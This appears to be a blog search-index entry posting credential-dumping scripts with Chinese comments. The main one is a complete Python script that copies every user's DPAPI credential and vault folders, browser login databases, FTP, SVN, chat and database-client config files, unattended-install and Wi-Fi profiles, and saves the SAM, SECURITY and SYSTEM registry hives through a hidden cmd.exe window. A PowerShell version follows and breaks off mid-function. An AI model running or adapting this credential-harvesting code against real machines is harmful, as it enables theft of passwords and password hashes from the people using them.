<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title><![CDATA[dump read]]></title>
<url>http://phpplay.github.io/2018/03/20/dump-read/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="dump-read"><a href="#dump-read" class="headerlink" title="dump read"></a>dump read</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div 
class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div><div 
class="line">143</div><div class="line">144</div><div class="line">145</div><div class="line">146</div><div class="line">147</div><div class="line">148</div><div class="line">149</div><div class="line">150</div><div class="line">151</div><div class="line">152</div><div class="line">153</div><div class="line">154</div><div class="line">155</div><div class="line">156</div><div class="line">157</div><div class="line">158</div><div class="line">159</div><div class="line">160</div><div class="line">161</div><div class="line">162</div><div class="line">163</div><div class="line">164</div><div class="line">165</div><div class="line">166</div><div class="line">167</div><div class="line">168</div><div class="line">169</div><div class="line">170</div><div class="line">171</div><div class="line">172</div><div class="line">173</div><div class="line">174</div><div class="line">175</div><div class="line">176</div><div class="line">177</div><div class="line">178</div><div class="line">179</div><div class="line">180</div><div class="line">181</div><div class="line">182</div><div class="line">183</div><div class="line">184</div><div class="line">185</div><div class="line">186</div><div class="line">187</div><div class="line">188</div><div class="line">189</div><div class="line">190</div><div class="line">191</div><div class="line">192</div><div class="line">193</div><div class="line">194</div><div class="line">195</div><div class="line">196</div><div class="line">197</div><div class="line">198</div><div class="line">199</div><div class="line">200</div><div class="line">201</div><div class="line">202</div><div class="line">203</div><div class="line">204</div><div class="line">205</div><div class="line">206</div><div class="line">207</div><div class="line">208</div><div class="line">209</div><div class="line">210</div><div class="line">211</div><div class="line">212</div><div class="line">213</div><div class="line">214</div><div class="line">215</div><div class="line">216</div><div 
class="line">217</div><div class="line">218</div><div class="line">219</div><div class="line">220</div><div class="line">221</div><div class="line">222</div><div class="line">223</div><div class="line">224</div><div class="line">225</div><div class="line">226</div><div class="line">227</div><div class="line">228</div><div class="line">229</div><div class="line">230</div><div class="line">231</div><div class="line">232</div><div class="line">233</div><div class="line">234</div><div class="line">235</div><div class="line">236</div><div class="line">237</div><div class="line">238</div><div class="line">239</div><div class="line">240</div><div class="line">241</div><div class="line">242</div><div class="line">243</div><div class="line">244</div><div class="line">245</div><div class="line">246</div><div class="line">247</div><div class="line">248</div><div class="line">249</div><div class="line">250</div><div class="line">251</div><div class="line">252</div><div class="line">253</div><div class="line">254</div><div class="line">255</div><div class="line">256</div><div class="line">257</div><div class="line">258</div><div class="line">259</div><div class="line">260</div><div class="line">261</div><div class="line">262</div><div class="line">263</div><div class="line">264</div><div class="line">265</div><div class="line">266</div><div class="line">267</div><div class="line">268</div><div class="line">269</div><div class="line">270</div><div class="line">271</div><div class="line">272</div><div class="line">273</div><div class="line">274</div><div class="line">275</div><div class="line">276</div><div class="line">277</div><div class="line">278</div><div class="line">279</div><div class="line">280</div><div class="line">281</div><div class="line">282</div><div class="line">283</div><div class="line">284</div><div class="line">285</div><div class="line">286</div><div class="line">287</div><div class="line">288</div><div class="line">289</div><div class="line">290</div><div 
class="line">291</div><div class="line">292</div><div class="line">293</div><div class="line">294</div><div class="line">295</div><div class="line">296</div><div class="line">297</div><div class="line">298</div><div class="line">299</div><div class="line">300</div><div class="line">301</div><div class="line">302</div><div class="line">303</div><div class="line">304</div><div class="line">305</div><div class="line">306</div><div class="line">307</div><div class="line">308</div><div class="line">309</div><div class="line">310</div><div class="line">311</div><div class="line">312</div><div class="line">313</div><div class="line">314</div><div class="line">315</div><div class="line">316</div><div class="line">317</div></pre></td><td class="code"><pre><div class="line">#!/usr/bin/env python</div><div class="line"># -*- coding: utf-8 -*- </div><div class="line">import _subprocess as sub</div><div class="line">import subprocess</div><div class="line">import shutil</div><div class="line">import json</div><div class="line">import os</div><div class="line"></div><div class="line">user_softwares = [</div><div class="line"> ##################### Data Protection应用程序编程接口(DPAPI) ####################</div><div class="line"> {</div><div class="line"> 'name' : 'DPAPI',</div><div class="line"> 'subfolder' : 'Roaming',</div><div class="line"> 'paths' : [</div><div class="line"> u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Microsoft\\Protect', # 保护文件夹</div><div class="line"> u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Microsoft\\Credentials', # #凭证文件夹(域密码等)</div><div class="line"> u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Microsoft\\Vault', </div><div class="line"> ],</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'DPAPI',</div><div class="line"> 'subfolder' : 'Local',</div><div class="line"> 'paths' : [</div><div class="line"> u'{drive}:\\Users\\{user}\\AppData\\Local\\Microsoft\\Credentials', </div><div class="line"> 
u'{drive}:\\Users\\{user}\\AppData\\Local\\Microsoft\\Vault', # 保险柜文件夹(Internet Explorer密码等)</div><div class="line"> ],</div><div class="line"> },</div><div class="line"></div><div class="line"> ##################### 浏览器 ####################</div><div class="line"> {</div><div class="line"> 'name' : 'Chrome',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\AppData\\Local\\Google\\Chrome\\User Data'],</div><div class="line"> 'profile' : u'Local State',</div><div class="line"> 'files' : [u'Login Data']</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'Coccoc',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\AppData\\Local\\CocCoc\\Browser\\User Data'],</div><div class="line"> 'profile' : u'Local State',</div><div class="line"> 'files' : [u'Login Data']</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'Firefox',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles'],</div><div class="line"> 'files' : [</div><div class="line"> u'key4.db',</div><div class="line"> u'key3.db',</div><div class="line"> u'logins.json',</div><div class="line"> u'cert8.db'</div><div class="line"> ]</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'Opera',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data'],</div><div class="line"> },</div><div class="line"></div><div class="line"></div><div class="line"> ##################### Pidgin聊天 ####################</div><div class="line"> {</div><div class="line"> 'name' : 'Pidgin',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\AppData\\Roaming\\.purple\\accounts.xml'],</div><div class="line"> },</div><div class="line"></div><div class="line"> ##################### 数据库 #####################</div><div class="line"></div><div class="line"> {</div><div class="line"> 'name' : 
'Dbvis',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\.dbvis\\config70\\dbvis.xml'],</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'Robomongo',</div><div class="line"> 'paths' : [</div><div class="line"> u'{drive}:\\Users\\{user}\\.config\Robomongo\\robomongo.json', # old version</div><div class="line"> u'{drive}:\\Users\\{user}\\.3T\\robo-3t\\1.1.1\\robo3t.json', # new version</div><div class="line"> ],</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'Squirrel',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\.squirrel-sql\\SQLAliases23.xml'],</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'SQL Developer',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\AppData\\Roaming\\SQL Developer'],</div><div class="line"> },</div><div class="line"></div><div class="line"> ##################### 雷鸟邮件 #####################</div><div class="line"> {</div><div class="line"> 'name' : 'Thunderbird',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Thunderbird\\Profiles'],</div><div class="line"> 'files' : [</div><div class="line"> u'key3.db',</div><div class="line"> u'logins.json',</div><div class="line"> u'cert8.db'</div><div class="line"> ]</div><div class="line"> },</div><div class="line"></div><div class="line"> ##################### SVN #####################</div><div class="line"> {</div><div class="line"> 'name' : 'Tortoise',</div><div class="line"> 'paths' : [u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Subversion\\auth\\svn.simple'],</div><div class="line"> },</div><div class="line"></div><div class="line"> ##################### Sysadmin #####################</div><div class="line"> {</div><div class="line"> 'name' : 'ApacheDirectoryStudio',</div><div class="line"> 'paths' : 
[u'{drive}:\\Users\\{user}\\.ApacheDirectoryStudio\\.metadata\\.plugins\\org.apache.directory.studio.connection.core\\connections.xml'],</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'Filezilla',</div><div class="line"> 'paths' : [</div><div class="line"> u'{drive}:\\Users\\{user}\\AppData\\Roaming\\FileZilla\\sitemanager.xml', </div><div class="line"> u'{drive}:\\Users\\{user}\\AppData\\Roaming\\FileZilla\\recentservers.xml', </div><div class="line"> u'{drive}:\\Users\\{user}\\AppData\\Roaming\\FileZilla\\filezilla.xml'</div><div class="line"> ],</div><div class="line"> },</div><div class="line"> {</div><div class="line"> 'name' : 'FTP Navigator',</div><div class="line"> 'paths' : [u'{drive}:\\FTP Navigator\\Ftplist.txt'],</div><div class="line"> },</div><div class="line"> ]</div><div class="line"></div><div class="line">system_softwares = [</div><div class="line"> ##################### DPAPI ####################</div><div class="line"> {</div><div class="line"> 'name' : 'DPAPI',</div><div class="line"> 'paths' : [</div><div class="line"> u'{drive}:\\Windows\\System32\\Microsoft\\Protect',</div><div class="line"> u'{drive}:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Vault'</div><div class="line"> ],</div><div class="line"> },</div><div class="line"></div><div class="line"> ##################### 无人配置文件 ####################</div><div class="line"> {</div><div class="line"> 'name' : 'Unattended',</div><div class="line"> 'paths' : [</div><div class="line"> u'{drive}:\\Windows\\Panther\\Unattend.xml', </div><div class="line"> u'{drive}:\\Windows\\Panther\\Unattended.xml',</div><div class="line"> u'{drive}:\\Windows\\Panther\\Unattend\\Unattended.xml',</div><div class="line"> u'{drive}:\\Windows\\Panther\\Unattend\\Unattend.xml',</div><div class="line"> u'{drive}:\\Windows\\System32\\\Sysprep\\unattend.xml',</div><div class="line"> u'{drive}:\\Windows\\System32\\Sysprep\\Panther\\unattend.xml',</div><div 
class="line"></div><div class="line"> ],</div><div class="line"> },</div><div class="line"></div><div class="line"> ##################### Wifi ####################</div><div class="line"> {</div><div class="line"> 'name' : 'Wifi',</div><div class="line"> 'paths' : [</div><div class="line"> u'{drive}:\\ProgramData\\Microsoft\\Wlansvc\\Profiles\\Interfaces', </div><div class="line"> ],</div><div class="line"> },</div><div class="line"> ]</div><div class="line"></div><div class="line"># 获取用户列表以检索他们的密码</div><div class="line">def get_user_list_on_filesystem(drive):</div><div class="line"> # 检查系统中现有的用户(仅获取目录)</div><div class="line"> user_path = u'{drive}:\\Users'.format(drive=drive)</div><div class="line"> all_users = []</div><div class="line"> if os.path.exists(user_path):</div><div class="line"> all_users = os.listdir(user_path)</div><div class="line"> </div><div class="line"> # 删除默认用户</div><div class="line"> for user in [u'All Users', u'Default User', u'Default', u'Public', u'desktop.ini']:</div><div class="line"> if user in all_users:</div><div class="line"> all_users.remove(user)</div><div class="line"></div><div class="line"> return all_users</div><div class="line"></div><div class="line"># 应该在Linux和Windows主机上运行Windows</div><div class="line">def get_basename(path):</div><div class="line"> basename = path.split('\\')</div><div class="line"> return basename[len(basename)-1]</div><div class="line"></div><div class="line">def copy_dir(src, path):</div><div class="line"> dst = '{path}\{src_basename}'.format(path=path, src_basename=get_basename(src))</div><div class="line"> </div><div class="line"> try:</div><div class="line"> if os.path.isdir(src):</div><div class="line"> shutil.copytree(src, dst)</div><div class="line"> else:</div><div class="line"> shutil.copy(src, dst)</div><div class="line"> print '[+] Copied: {src}'.format(src=src)</div><div class="line"> return True</div><div class="line"> except:</div><div class="line"> print '[-] Failed to copied: 
{src}'.format(src=src)</div><div class="line"> return False</div><div class="line"></div><div class="line">def create_dir(directory):</div><div class="line"> if not os.path.exists(directory):</div><div class="line"> os.makedirs(directory)</div><div class="line"> print '[+] Creating directory: {directory}'.format(directory=directory)</div><div class="line"> return True</div><div class="line"> else:</div><div class="line"> return False</div><div class="line"></div><div class="line"># 只使用文件系统进行脱机检查: http://resources.infosecinstitute.com/registry-forensics-regripper-command-line-linux/</div><div class="line">def run_cmd(cmdline):</div><div class="line"> command = ['cmd.exe', '/c', cmdline]</div><div class="line"> info = subprocess.STARTUPINFO()</div><div class="line"> info.dwFlags = sub.STARTF_USESHOWWINDOW</div><div class="line"> info.wShowWindow = sub.SW_HIDE</div><div class="line"> p = subprocess.Popen(command, startupinfo=info, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, universal_newlines=True)</div><div class="line"> results, _ = p.communicate()</div><div class="line"># 获得一份SYSTEM, SECURITY 和 SAM信息</div><div class="line">def save_hives(directory):</div><div class="line"> create_dir(directory)</div><div class="line"></div><div class="line"> hives = ['sam', 'security', 'system']</div><div class="line"> for h in hives:</div><div class="line"> try:</div><div class="line"> cmd = 'reg.exe save hklm\{hive} {output_name}'.format(hive=h, output_name=os.path.join(directory, h.upper()))</div><div class="line"> run_cmd(cmd)</div><div class="line"> print '[+] Dump {hive_name} hive'.format(hive_name=h)</div><div class="line"> except Exception, e:</div><div class="line"> return False</div><div class="line"> return True</div><div class="line"></div><div class="line"></div><div class="line">def dump(drive= u'C', folder_results=u'dump', zip_folder=False):</div><div class="line"></div><div class="line"> users_folder = os.path.join(folder_results, u'Users')</div><div 
class="line"> system_folder = os.path.join(folder_results, u'System')</div><div class="line"></div><div class="line"> create_dir(folder_results)</div><div class="line"> create_dir(users_folder)</div><div class="line"> create_dir(system_folder)</div><div class="line"></div><div class="line"> # 循环遍历C:\ Users中可见的所有用户</div><div class="line"> for user in get_user_list_on_filesystem(drive):</div><div class="line"> </div><div class="line"> user_folder = os.path.join(users_folder, user)</div><div class="line"> create_dir(user_folder)</div><div class="line"></div><div class="line"> # 遍历所有由lazagne支持的软件</div><div class="line"> for software in user_softwares:</div><div class="line"> # 获取需要转储的所有文件路径</div><div class="line"> for path in software['paths']:</div><div class="line"> path = path.format(drive=drive, user=user)</div><div class="line"> </div><div class="line"> if os.path.exists(path):</div><div class="line"> software_folder = os.path.join(user_folder, software['name'])</div><div class="line"> if 'subfolder' in software:</div><div class="line"> software_folder = os.path.join(software_folder, software['subfolder'])</div><div class="line"> </div><div class="line"> create_dir(software_folder)</div><div class="line"> </div><div class="line"> # 管理软件异常:转储多个配置文件</div><div class="line"> if software['name'] == 'Firefox' or software['name'] == 'Thunderbird':</div><div class="line"> for profile in os.listdir(path):</div><div class="line"> profile_folder = os.path.join(software_folder, profile)</div><div class="line"> create_dir(profile_folder)</div><div class="line"> for file in software['files']:</div><div class="line"> src = os.path.join(path, profile, file)</div><div class="line"> copy_dir(src, profile_folder)</div><div class="line"></div><div class="line"> elif software['name'] == 'Chrome' or software['name'] == 'Coccoc':</div><div class="line"> profiles = []</div><div class="line"> if os.path.exists(os.path.join(path, software['profile'])):</div><div class="line"> with 
open(os.path.join(path, software['profile'])) as file: </div><div class="line"> data = json.load(file)</div><div class="line"> for profile in data['profile']['info_cache']:</div><div class="line"> profiles.append(profile)</div><div class="line"> </div><div class="line"> for profile in profiles:</div><div class="line"> profile_folder = os.path.join(software_folder, profile)</div><div class="line"> create_dir(profile_folder)</div><div class="line"> for file in software['files']:</div><div class="line"> src = os.path.join(path, profile, file)</div><div class="line"> copy_dir(src, profile_folder)</div><div class="line"></div><div class="line"> # 管理软件异常:当文件名称在版本之间改变时</div><div class="line"> elif software['name'] == 'SQL Developer':</div><div class="line"> new_directory = ''</div><div class="line"> for p in os.listdir(path):</div><div class="line"> # 一个子目录以systemxxxx开头</div><div class="line"> if p.startswith('system'):</div><div class="line"> new_directory = os.path.join(path, p)</div><div class="line"></div><div class="line"> for p in os.listdir(new_directory):</div><div class="line"> if p.startswith(u'o.sqldeveloper'):</div><div class="line"> xml_file = os.path.join(new_directory, p, u'product-preferences.xml')</div><div class="line"> if os.path.exists(xml_file):</div><div class="line"> copy_dir(xml_file, software_folder)</div><div class="line"></div><div class="line"> if p.startswith(u'o.jdeveloper'):</div><div class="line"> xml_file = os.path.join(new_directory, p, u'connections.xml')</div><div class="line"> if os.path.exists(xml_file):</div><div class="line"> copy_dir(xml_file, software_folder)</div><div class="line"> break</div><div class="line"></div><div class="line"> # 复制软件的文件无一例外</div><div class="line"> else:</div><div class="line"> copy_dir(path, software_folder)</div><div class="line"></div><div class="line"></div><div class="line"> # 系统信息</div><div class="line"> for software in system_softwares:</div><div class="line"> # 获取需要转储的所有文件路径</div><div class="line"> 
for path in software['paths']:</div><div class="line"> path = path.format(drive=drive)</div><div class="line"> </div><div class="line"> if os.path.exists(path):</div><div class="line"> software_folder = os.path.join(system_folder, software['name'])</div><div class="line"> create_dir(software_folder)</div><div class="line"> copy_dir(path, software_folder)</div><div class="line"></div><div class="line"> save_hives(directory=os.path.join(system_folder, 'Hives'))</div><div class="line"></div><div class="line"> if not zip_folder:</div><div class="line"> print '[+] Directory created: {directory}'.format(directory=folder_results)</div><div class="line"></div><div class="line"></div><div class="line">if __name__ == '__main__':</div><div class="line"> file = 'dump'</div><div class="line"> </div><div class="line"> dump(folder_results=file)</div></pre></td></tr></table></figure>
<hr>
<h2 id="powershell-dump-script"><a href="#powershell-dump-script" class="headerlink" title="powershell dump script"></a>powershell dump script</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div 
class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div><div class="line">143</div><div 
class="line">144</div><div class="line">145</div><div class="line">146</div><div class="line">147</div><div class="line">148</div><div class="line">149</div><div class="line">150</div><div class="line">151</div><div class="line">152</div><div class="line">153</div><div class="line">154</div><div class="line">155</div><div class="line">156</div><div class="line">157</div><div class="line">158</div><div class="line">159</div><div class="line">160</div><div class="line">161</div><div class="line">162</div><div class="line">163</div><div class="line">164</div><div class="line">165</div><div class="line">166</div><div class="line">167</div><div class="line">168</div><div class="line">169</div><div class="line">170</div><div class="line">171</div><div class="line">172</div><div class="line">173</div><div class="line">174</div><div class="line">175</div><div class="line">176</div><div class="line">177</div><div class="line">178</div><div class="line">179</div><div class="line">180</div><div class="line">181</div><div class="line">182</div><div class="line">183</div><div class="line">184</div><div class="line">185</div><div class="line">186</div><div class="line">187</div><div class="line">188</div><div class="line">189</div><div class="line">190</div><div class="line">191</div><div class="line">192</div><div class="line">193</div><div class="line">194</div><div class="line">195</div><div class="line">196</div><div class="line">197</div><div class="line">198</div><div class="line">199</div><div class="line">200</div><div class="line">201</div><div class="line">202</div><div class="line">203</div><div class="line">204</div><div class="line">205</div><div class="line">206</div><div class="line">207</div><div class="line">208</div><div class="line">209</div><div class="line">210</div><div class="line">211</div><div class="line">212</div><div class="line">213</div><div class="line">214</div><div class="line">215</div><div class="line">216</div><div class="line">217</div><div 
class="line">218</div><div class="line">219</div><div class="line">220</div><div class="line">221</div><div class="line">222</div><div class="line">223</div><div class="line">224</div><div class="line">225</div><div class="line">226</div><div class="line">227</div><div class="line">228</div><div class="line">229</div><div class="line">230</div><div class="line">231</div><div class="line">232</div><div class="line">233</div><div class="line">234</div><div class="line">235</div><div class="line">236</div><div class="line">237</div><div class="line">238</div><div class="line">239</div><div class="line">240</div><div class="line">241</div><div class="line">242</div><div class="line">243</div><div class="line">244</div><div class="line">245</div><div class="line">246</div><div class="line">247</div><div class="line">248</div><div class="line">249</div><div class="line">250</div><div class="line">251</div><div class="line">252</div><div class="line">253</div><div class="line">254</div><div class="line">255</div><div class="line">256</div><div class="line">257</div><div class="line">258</div><div class="line">259</div><div class="line">260</div><div class="line">261</div><div class="line">262</div><div class="line">263</div><div class="line">264</div><div class="line">265</div><div class="line">266</div><div class="line">267</div><div class="line">268</div><div class="line">269</div><div class="line">270</div><div class="line">271</div><div class="line">272</div><div class="line">273</div><div class="line">274</div><div class="line">275</div><div class="line">276</div><div class="line">277</div><div class="line">278</div><div class="line">279</div><div class="line">280</div><div class="line">281</div><div class="line">282</div><div class="line">283</div><div class="line">284</div><div class="line">285</div><div class="line">286</div><div class="line">287</div><div class="line">288</div><div class="line">289</div><div class="line">290</div><div class="line">291</div><div 
class="line">292</div><div class="line">293</div><div class="line">294</div><div class="line">295</div><div class="line">296</div><div class="line">297</div><div class="line">298</div><div class="line">299</div><div class="line">300</div><div class="line">301</div><div class="line">302</div><div class="line">303</div><div class="line">304</div><div class="line">305</div><div class="line">306</div><div class="line">307</div><div class="line">308</div><div class="line">309</div><div class="line">310</div><div class="line">311</div><div class="line">312</div><div class="line">313</div><div class="line">314</div><div class="line">315</div><div class="line">316</div><div class="line">317</div><div class="line">318</div><div class="line">319</div><div class="line">320</div><div class="line">321</div><div class="line">322</div><div class="line">323</div><div class="line">324</div><div class="line">325</div><div class="line">326</div><div class="line">327</div><div class="line">328</div><div class="line">329</div><div class="line">330</div><div class="line">331</div><div class="line">332</div><div class="line">333</div><div class="line">334</div><div class="line">335</div><div class="line">336</div><div class="line">337</div><div class="line">338</div><div class="line">339</div><div class="line">340</div><div class="line">341</div><div class="line">342</div><div class="line">343</div><div class="line">344</div><div class="line">345</div><div class="line">346</div><div class="line">347</div><div class="line">348</div><div class="line">349</div><div class="line">350</div><div class="line">351</div><div class="line">352</div><div class="line">353</div><div class="line">354</div><div class="line">355</div><div class="line">356</div><div class="line">357</div><div class="line">358</div><div class="line">359</div><div class="line">360</div><div class="line">361</div><div class="line">362</div><div class="line">363</div><div class="line">364</div><div class="line">365</div><div 
class="line">366</div><div class="line">367</div><div class="line">368</div><div class="line">369</div><div class="line">370</div><div class="line">371</div><div class="line">372</div><div class="line">373</div><div class="line">374</div><div class="line">375</div><div class="line">376</div><div class="line">377</div><div class="line">378</div><div class="line">379</div><div class="line">380</div><div class="line">381</div></pre></td><td class="code"><pre><div class="line"></div><div class="line">function CheckFiles($dst, $user, $d) </div><div class="line">{</div><div class="line"> for ($i=0; $i -lt $d['paths'].length; $i++) {</div><div class="line"> </div><div class="line"> $path = $d['paths'][$i].replace('[USER]', $user)</div><div class="line"> # 如果没有找到配置文件,请不要创建目录</div><div class="line"> if ((Test-Path $path))</div><div class="line"> {</div><div class="line"> if (!(Test-Path $dst))</div><div class="line"> {</div><div class="line"> CreateDir($dst)</div><div class="line"> }</div><div class="line"> CopyFile $path $dst</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line"># 管理多个档案</div><div class="line">function ManageMozilla($root, $user, $d){</div><div class="line"> $mozilla_software_path = $d['paths'].replace('[USER]', $user)</div><div class="line"></div><div class="line"> if (Test-Path $mozilla_software_path) {</div><div class="line"> $mozilla_folder = $root + '\' + $d['name']</div><div class="line"> CreateDir($mozilla_folder)</div><div class="line"></div><div class="line"> $profiles = Get-ChildItem -Path $mozilla_software_path</div><div class="line"> foreach ($profile in $profiles.Name)</div><div class="line"> {</div><div class="line"> $profile_folder = $mozilla_folder + '\' + $profile</div><div class="line"> CreateDir($profile_folder)</div><div class="line"> for ($i=0; $i -lt $d['files'].length; $i++) {</div><div class="line"> $path = $d['paths'].replace('[USER]', $user) + '\' + $profile + 
'\' + $d['files'][$i]</div><div class="line"> $dst = $profile_folder + '\' + $d['files'][$i]</div><div class="line"></div><div class="line"> CopyFile $path $dst</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line"># 适用于Chrome和一些浏览器</div><div class="line">function ManageChromeProfile($root, $user, $d)</div><div class="line">{</div><div class="line"> $chrome_folder = $root + '\' + $d['name']</div><div class="line"></div><div class="line"> $path = $d['paths'].replace('[USER]', $user)</div><div class="line"> $paths = Get-ChildItem -Path $path -Filter $d['file'] -Recurse -ErrorAction SilentlyContinue -Force</div><div class="line"> </div><div class="line"> If ($paths -ne $null){</div><div class="line"> CreateDir($chrome_folder)</div><div class="line"> foreach ($p in $paths.Directory.Name)</div><div class="line"> {</div><div class="line"> $profile_folder = $chrome_folder + '\' + $p</div><div class="line"> CreateDir($profile_folder)</div><div class="line"> </div><div class="line"> $src = $path + '\' + $p + '\' + $d['file']</div><div class="line"> $dst = $profile_folder + '\' + $d['file']</div><div class="line"></div><div class="line"> CopyFile $src $dst</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line">function CopyFile($path, $dst){</div><div class="line"> if (Test-Path $path) {</div><div class="line"> if ((Get-Item $path) -is [System.IO.DirectoryInfo])</div><div class="line"> {</div><div class="line"> # Directory</div><div class="line"> Copy-Item -Recurse -Path $path -Destination $dst</div><div class="line"> }</div><div class="line"> else</div><div class="line"> {</div><div class="line"> # File</div><div class="line"> Copy-Item -Path $path -Destination $dst</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line">function 
